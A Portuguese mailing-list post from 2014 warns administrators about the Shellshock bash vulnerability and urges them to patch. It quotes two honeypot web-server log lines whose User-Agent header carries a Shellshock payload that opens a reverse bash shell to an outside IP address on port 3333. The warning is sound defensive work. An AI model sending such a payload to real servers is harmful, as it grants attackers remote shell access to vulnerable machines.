Caros amigos,
A vulnerabilidade do bash conhecida como shellshock foi descoberta
recentemente e divulgada ontem. Ela permite a execução de comandos remotos
nos servidores através dos servidores http. Os nossos honeypots já estão
detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo
em atualizar os servidores e evitem fraudes.
Exemplo do que estamos detectando neste exato momento:
[26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;};
/bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
[26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404
507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333
0>&1'"
Att,
Flavio E. Goncalves
_______________________________________________
WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO
DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES.
Garanta a sua vaga e saiba mais em: www.workoffee.com.br
_______________________________________________
ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP .
Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br
_______________________________________________
DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS
para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
Construa soluções de PABX IP com produtos DigiVoice - visite
www.digivoice.com.br
_______________________________________________
Para remover seu email desta lista, basta enviar um email em branco para
[email protected]
